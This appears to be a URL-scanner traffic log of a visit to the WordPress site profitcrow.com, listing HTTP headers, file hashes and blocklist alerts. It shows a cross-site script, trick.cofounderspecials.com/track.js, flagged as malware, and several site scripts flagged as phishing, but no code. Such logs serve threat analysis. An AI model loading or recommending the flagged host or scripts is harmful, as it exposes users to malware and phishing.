TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 286
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (483)
Size:   286
Md5:    8828fa3c5bdcfa66615714a2b8c9d807
Sha1:   4f556d0b005ac7754af607418df445f8cf98e8b1
Sha256: 16950dcce60bc3ee2613b60439c99e7ed74d10245f59fe6f68346b7e72dd95e7
                                        
                                            GET /wp-content/uploads/pum/pum-site-styles.css?generated=1641964841&ver=1.16.2 HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 12 Jan 2022 05:20:41 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3102
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (7400), with CRLF, LF line terminators
Size:   3102
Md5:    920f89b21ad5a2d8ed4efa9f0fda0b03
Sha1:   648ae8495290bbe008f86f0638162dded33a3f16
Sha256: e97e6e5e0ed3ce4ed759ddd41f67f288240459a78cf350d40359b83c6ec47699
                                        
                                            GET /wp-includes/js/mediaelement/wp-mediaelement.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Sat, 08 Jun 2019 06:15:02 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 982
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4186), with no line terminators
Size:   982
Md5:    24f4d7f425e792ab35adaab50816e54a
Sha1:   9e25bf79b674ddb7ba09ad7f118c50ec473c02c8
Sha256: 1c78bfb4d523785a4ebd37bb1f79f214f9bdb16673f7cc50805f7f1a26ad7f83
                                        
                                            GET /track.js?v=9.999 HTTP/1.1 
Host: trick.cofounderspecials.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         91.211.91.112
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx
Date: Fri, 25 Nov 2022 22:08:04 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Fri, 29 Jul 2022 15:36:49 GMT
ETag: W/"5b0-5e4f36b22e013"
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   729
Md5:    604eea713faef1ae8dafc0224112e662
Sha1:   89f4a04f3088b7fdb308cd0af944a38c6ed99c2b
Sha256: 3905c65876c7b7c1f0a8efae5c758b100d3903c2f94e7177285e898c80eb10f2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/elementor/thumbs/2-pmkl2wqht9wn13yhe2adcrd3furau760twajm8xi1g.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 29 Mar 2022 08:34:39 GMT
accept-ranges: bytes
content-length: 13030
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced\012- data
Size:   13030
Md5:    ec96ac85442a6381a7e762e716974df4
Sha1:   879e3d5c7965091b1aff35feb5a7a7b8b4c83fd8
Sha256: 78e1791fc3b878a7a461d68a098d7a3d7ec3bc21ab5ca5ffdd6d81abb571e7e7
                                        
                                            GET /wp-content/uploads/elementor/thumbs/Untitled-4-pi82g9b1s4qlpfyf5iy2ov6tttz3gdf0qamvz4fxgg.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 29 Dec 2021 10:41:38 GMT
accept-ranges: bytes
content-length: 5086
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced\012- data
Size:   5086
Md5:    76aa60c2d1385f56e5b05560927cdfb7
Sha1:   8867884634b19102e751a2441b2f45f86fad792d
Sha256: bc97a3f653cfc70af9b11a489149c6741f0e51a1acc1cf5c39627cb57003a763
                                        
                                            GET /wp-content/uploads/elementor/thumbs/3-pmkfrnip7u3apfrn6w45iito4ffnnaw6v9mvaeia38.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 29 Mar 2022 06:34:43 GMT
accept-ranges: bytes
content-length: 9349
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced\012- data
Size:   9349
Md5:    a1aa7295ba56eb8716240a1792bf5d5d
Sha1:   441badab503b3466a7fe589fedf298fa3bacb192
Sha256: 1b87b30adff34e79488b34e0dd5c616f9b464ced0172da0ee0c591585491818a
                                        
                                            GET /wp-content/uploads/elementor/thumbs/1-pmkl57gaip1vesmbz21jg6hnprflnkaeh9p9uliutw.png HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: image/png
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 29 Mar 2022 08:34:39 GMT
accept-ranges: bytes
content-length: 14777
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced\012- data
Size:   14777
Md5:    a62538a857b9423187a009083b45aa16
Sha1:   424f3f7c6208b9fc25db044a655fd3258dc02be2
Sha256: 87cf17d8ba09369f62c1906e29b066341763c3cb95ec6c2cc596a80bd7861ccb
                                        
                                            GET /wp-includes/js/mediaelement/mediaelement-migrate.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1751
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1213)
Size:   1751
Md5:    12045a493fe71cd86696bc193d512d1e
Sha1:   7e061eb7721ac84f1ae59d093af07dc756937e6e
Sha256: 2b94f6d902c60d5376a162522874fccdc8d7e54c1befbab1df32091f0f68364a

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/mediaelement/wp-mediaelement.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1678
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text, with very long lines (928)
Size:   1678
Md5:    a1482c9dcef3633f83929e0f810a0939
Sha1:   697c20961e00099597911848396ae7a6051808ab
Sha256: 17f72ff4442a051ac09b971abedc3c8278f9ad192b99cb60db1908393d5f1857

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/dist/vendor/wp-polyfill.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 03 Aug 2022 05:15:30 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 8194
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (19160)
Size:   8194
Md5:    a6433517266477ff06e6f99332ba4b51
Sha1:   10d396d74458024e4cef9da9bde6f640c7255d62
Sha256: 4ac649253d4eaf595a196a7a50def87064451a81f702f35ef7f2ced7e04b1d12

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/animations/animations.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2442
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (10019)
Size:   2442
Md5:    d2db71c82a8f672aea59a3e050cd8cd7
Sha1:   af626566f94b3164e4310288cfb142431e8349a6
Sha256: bcd2c9c2ba22a48a8fabf9fbe5e947deb6404367e4be24f48326e302aead1180
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/js/index.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 11:30:13 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4852
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text, with very long lines (11884)
Size:   4852
Md5:    5b1cb80f27a0b3ce5c5911ac842cd370
Sha1:   108ef33ff23345ae3deea8c96d6f51e77b59d8a4
Sha256: 8e9fad5c6fcc62d5a7868bdb202fdfdb602a444b42f1e7faa4345beedb7c5a8d

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 17 Dec 2020 14:57:07 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1762
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   1762
Md5:    64f4fafbb654071b435c0d8429ff2424
Sha1:   1a9368b246c6e2303f01052f1bdd4e565a6e8754
Sha256: a1fabf1c4dd892f4d9b9c5c791619c9971f4b69d396677ec98bc04876243369a

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12841
Expires: Sat, 26 Nov 2022 01:42:05 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F56b1fea9-e9cd-44f8-a1ed-26557538d958.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 12319
x-amzn-requestid: 6973e196-9eb3-4aea-9c60-b8e2158641ea
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLVOoGkgIAMFY4Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63813590-62965d4c607d4f0a060265d9;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:37:20 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: U2lRuGTHsBCJ7HqZcNbwMXTuNJsghqL0p-hMJyUfiWAdXla2pJ6JRw==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 a3bd0eb50c22e4d5fbda56a30b96002c.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:46:06 GMT
etag: "fd67260f92d7faee2360956e8d2ed50a00c1dbcf"
age: 1318
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   12319
Md5:    8a82cc688f934411a894427bd493c429
Sha1:   fd67260f92d7faee2360956e8d2ed50a00c1dbcf
Sha256: fbd1a487dac7233861d173e711218d3e3402bc71f538025c540b93696309dc67
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1dd98515-d0af-440a-8f3d-4c9986928081.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4309
x-amzn-requestid: a22b4d7e-e208-4bda-81c2-d13e6463380e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: blE0hGNioAMF_Tg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6371e81c-1b13846866f56a0e47675e56;Sampled=0
x-amzn-remapped-date: Mon, 14 Nov 2022 07:02:52 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0sYKpJWi2Tv9Atz3PYXm5j7kmncAOxjcLcK4hgAkJ5b4pNMDmjdB6g==
via: 1.1 ddd913fbbe7367d44af4ac06097e7a2a.cloudfront.net (CloudFront), 1.1 28390a4d24ed4fdccd685d99cd06cf4e.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 04:38:44 GMT
age: 62960
etag: "126771b86638108050cf57c0d12faa27f80f0edb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4309
Md5:    841a4b110022a99ddea6f7bf66df0fa1
Sha1:   126771b86638108050cf57c0d12faa27f80f0edb
Sha256: 240fbffc1f9104433297d3ff7afba2d0b58d7f1b13d9a9260a1bad25216665db
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F53b989dd-5b05-43e6-807e-30a5611591c1.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 12505
x-amzn-requestid: a89c780f-e1a4-451e-842b-656ba43958be
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cLVOeHzfIAMFpGQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6381358f-3478b6c81d94ec65388bd3da;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 21:37:19 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: mUic7CJjKQ8l7EKhTTSs2LTLaCqnVQUBuxzmfzET4TwSa_LX8na-MA==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 476c2ba6d9f6cd69dbcedbd65688cbc0.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 21:43:28 GMT
age: 1476
etag: "05de7f68103849bd0cd80a704ef97685d0150800"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   12505
Md5:    9443750de7962c9e235cbb6dbda24df0
Sha1:   05de7f68103849bd0cd80a704ef97685d0150800
Sha256: d84e37f9bfd9888a385364c52cdc0d817aa680ee0a83e579ca1f1083f1131468
                                        
                                            GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
